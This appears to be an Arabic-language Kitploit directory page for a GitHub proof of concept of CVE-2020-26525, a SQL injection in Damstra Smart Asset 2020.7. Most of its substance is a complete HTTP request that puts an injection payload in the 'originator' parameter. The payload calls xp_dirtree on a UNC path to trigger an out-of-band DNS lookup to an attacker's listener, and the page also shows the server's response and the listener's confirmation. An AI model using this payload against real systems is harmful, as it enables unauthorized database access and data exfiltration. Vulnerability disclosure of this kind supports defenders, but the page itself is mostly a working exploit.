Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SmartAsset-SQLinj-CVE-2020-26525 — Damstra Smart Asset 2020.7 لديه SQL injection عبر API/api/Asset originator parameter. | Kitploit
أدوات/GitHubGitHub/lukaszstu/smartasset-sqlinj-cve-2020-26525
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHublukaszstu/smartasset-sqlinj-cve-2020-26525

SmartAsset-SQLinj-CVE-2020-26525

Damstra Smart Asset 2020.7 لديه SQL injection عبر API/api/Asset originator parameter.

عرض المستودع
1منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SmartAsset-SQLinj-CVE-2020-26525

يحتوي Damstra Smart Asset 2020.7 على ثغرة حقن SQL عبر معامل originator في API/api/Asset.

Smart Asset - الإصدار 2020.7

CVE-2020-26525

==========================

طلب HTTP:

GET /API/api/Asset?assetCode=XXX-08-X-01-06-01& originator=FIRSTNAME.LASTNAME'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c<>%5cqoe'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1 Authorization: Bearer eyJhbGc ... Cookie: _ga=GA1.3.1950130407.1600387365; _gid=GA1.3.1208628208.1600387365; ajs_group_id=null; intercom-id-zk1ecu97=47f0bf3f-35aa-4f97-9239-456XXa65; intercom-session-zkXX97=

==========================

استجابة HTTP:

HTTP/1.1 401 Unauthorized Cache-Control: no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 <>

"المُزوِّد المُقدَّم لا يتطابق مع المُزوِّد المُخزَّن داخل الرمز!"

==========================

تلقى خادم المستمع البعيد استعلام DNS من النوع A لاسم النطاق <> من target.url.com


[المكتشف] Lukasz Studniarz

تنزيل الأداة